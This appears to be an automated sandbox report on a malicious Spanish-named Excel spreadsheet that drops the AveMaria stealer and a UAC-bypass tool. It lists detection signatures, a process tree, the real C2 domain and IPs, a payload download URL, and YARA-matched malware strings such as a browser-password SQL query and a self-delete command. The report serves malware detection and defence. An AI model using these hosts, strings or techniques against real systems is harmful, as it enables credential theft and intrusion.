Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Estado.de.cuenta.xls

Overview

General Information

Sample name:Estado.de.cuenta.xls
Analysis ID:1574073
MD5:0e3fccb0710d5f645343f0e2085921f2
SHA1:e9122949ab988638db6d8c0af8817b6ea9aa32a3
SHA256:fcc55ce7ed8adcf68a39bcd131de11e4be7b55899f35614fc67b4ce6ae0d6c0f
Tags:xlsuser-abuse_ch
Infos:

Detection

AveMaria, UACMe
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AveMaria stealer
Yara detected UACMe UAC Bypass tool
.NET source code contains process injector
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Contains functionality to hide user accounts
Contains functionality to inject threads in other processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal e-mail passwords
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with hexadecimal encoded strings
Document exploit detected (process start blacklist hit)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Increases the number of concurrent connection per server for Internet Explorer
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Office process drops PE file
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to create new users
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3316 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • VPZVQXDUT.exe (PID: 3564 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe" MD5: 07472F63BDEC0C4A83767D19B8B7BA19)
      • VPZVQXDUT.exe (PID: 3592 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe MD5: 07472F63BDEC0C4A83767D19B8B7BA19)
      • VPZVQXDUT.exe (PID: 3600 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe MD5: 07472F63BDEC0C4A83767D19B8B7BA19)
        • msimages.exe (PID: 3704 cmdline: "C:\ProgramData\msimages.exe" MD5: 07472F63BDEC0C4A83767D19B8B7BA19)
          • msimages.exe (PID: 3732 cmdline: C:\ProgramData\msimages.exe MD5: 07472F63BDEC0C4A83767D19B8B7BA19)
          • msimages.exe (PID: 3744 cmdline: C:\ProgramData\msimages.exe MD5: 07472F63BDEC0C4A83767D19B8B7BA19)
  • msimages.exe (PID: 3836 cmdline: "C:\ProgramData\msimages.exe" MD5: 07472F63BDEC0C4A83767D19B8B7BA19)
    • msimages.exe (PID: 3864 cmdline: C:\ProgramData\msimages.exe MD5: 07472F63BDEC0C4A83767D19B8B7BA19)
    • msimages.exe (PID: 3872 cmdline: C:\ProgramData\msimages.exe MD5: 07472F63BDEC0C4A83767D19B8B7BA19)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Ave Maria, AveMariaRAT, avemariaInformation stealer which uses AutoIT for wrapping.
  • Anunak
https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria
NameDescriptionAttributionBlogpost URLsLink
UACMeA toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.uacme

Malware Configuration

Threatname: AveMaria

{"C2 url": "dns.stipamana.com", "port": 5220, "Proxy Port": 27904}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.374015317.000000000054F000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
    0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
      0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
          0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_AveMaria_31d2bce9unknownunknown
          • 0x1770c:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
          • 0x15f54:$a2: SMTP Password
          • 0x15194:$a3: select signon_realm, origin_url, username_value, password_value from logins
          • 0x1a3d0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          • 0x17614:$a5: for /F "usebackq tokens=*" %%A in ("
          • 0x15984:$a6: \Torch\User Data\Default\Login Data
          • 0x1a4f0:$a7: /n:%temp%\ellocnak.xml
          • 0x164f0:$a8: "os_crypt":{"encrypted_key":"
          • 0x1a520:$a9: Hey I'm Admin
          • 0x15e1c:$a10: \logins.json
          • 0x16468:$a11: Accounts\Account.rec0
          • 0x14d2c:$a12: warzone160
          • 0x173bc:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
          Click to see the 39 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.2.VPZVQXDUT.exe.3fb01e0.7.raw.unpackJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
            4.2.VPZVQXDUT.exe.3fb01e0.7.raw.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
            • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
            4.2.VPZVQXDUT.exe.2783860.4.raw.unpackJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
              4.2.VPZVQXDUT.exe.2783860.4.raw.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
              • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
              11.2.msimages.exe.29b1654.1.raw.unpackJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
                Click to see the 40 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: File With Uncommon Extension Created By An Office Application
                Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3316, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\asxhfzdhhz[1].exe
                Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3316, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe" , ProcessId: 3564, ProcessName: VPZVQXDUT.exe
                Sigma detected: Suspicious Microsoft Office Child Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3316, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe" , ProcessId: 3564, ProcessName: VPZVQXDUT.exe
                Sigma detected: Excel Network Connections
                Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 94.156.167.55, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3316, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                Sigma detected: Suspicious Office Outbound Connections
                Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3316, Protocol: tcp, SourceIp: 94.156.167.55, SourceIsIpv6: false, SourcePort: 443
                Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\msimages.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe, ProcessId: 3600, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\msimages
                Sigma detected: Modification of IE Registry Settings
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3316, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T21:54:10.287439+010020367341Malware Command and Control Activity Detected192.168.2.224923187.120.121.1605220TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T21:54:10.245477+010020367351Malware Command and Control Activity Detected87.120.121.1605220192.168.2.2249231TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T21:54:10.287439+010028523271Malware Command and Control Activity Detected192.168.2.224923187.120.121.1605220TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T21:54:10.245477+010028523261Malware Command and Control Activity Detected87.120.121.1605220192.168.2.2249231TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: Estado.de.cuenta.xlsAvira: detected
                Antivirus detection for URL or domain
                Source: https://www.stipamana.com/sdjfgsnzlkfoknzkfngasoeanpsDNbgsrggtehy/dyhdfyjdsftjsetawtwewayryghsdtysryatwewtrta/agasdrhstjhyfjghsrgaregafjyhdfhstsh/ydfctyxrgtsertrsez/asxhfzdhhz.exeAvira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\ProgramData\msimages.exeAvira: detection malicious, Label: HEUR/AGEN.1311032
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\asxhfzdhhz[1].exeAvira: detection malicious, Label: HEUR/AGEN.1311032
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeAvira: detection malicious, Label: HEUR/AGEN.1311032
                Found malware configuration
                Source: 4.2.VPZVQXDUT.exe.2783860.4.raw.unpackMalware Configuration Extractor: AveMaria {"C2 url": "dns.stipamana.com", "port": 5220, "Proxy Port": 27904}
                Multi AV Scanner detection for submitted file
                Source: Estado.de.cuenta.xlsReversingLabs: Detection: 50%
                Yara detected AveMaria stealer
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Machine Learning detection for dropped file
                Source: C:\ProgramData\msimages.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\asxhfzdhhz[1].exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: Estado.de.cuenta.xlsJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040B15E lstrlenA,CryptStringToBinaryA,lstrcpyA,6_2_0040B15E
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040CAFC CryptUnprotectData,LocalAlloc,LocalFree,6_2_0040CAFC
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040CC54 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,6_2_0040CC54
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040CCB4 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,6_2_0040CCB4
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040A632 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,6_2_0040A632
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040CF58 LocalAlloc,BCryptDecrypt,LocalFree,6_2_0040CF58

                Exploits

                barindex
                Yara detected UACMe UAC Bypass tool
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.3fb01e0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.2783860.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.msimages.exe.29b1654.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.msimages.exe.29af650.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.msimages.exe.29cecd8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.27a2ff0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.msimages.exe.29d0cdc.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.374015317.000000000054F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: VPZVQXDUT.exe PID: 3564, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: VPZVQXDUT.exe PID: 3600, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: msimages.exe PID: 3704, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: msimages.exe PID: 3836, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: unknownHTTPS traffic detected: 94.156.167.55:443 -> 192.168.2.22:49163 version: TLS 1.2
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_00409DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,6_2_00409DF6
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040FF27 FindFirstFileW,FindNextFileW,6_2_0040FF27
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0041002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,6_2_0041002B

                Software Vulnerabilities

                barindex
                Document exploit detected (creates forbidden files)
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\asxhfzdhhz[1].exeJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeJump to behavior
                Document exploit detected (drops PE files)
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: asxhfzdhhz[1].exe.0.drJump to dropped file
                Document exploit detected (process start blacklist hit)
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
                Source: global trafficDNS query: name: www.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficDNS query: name: dns.stipamana.com
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
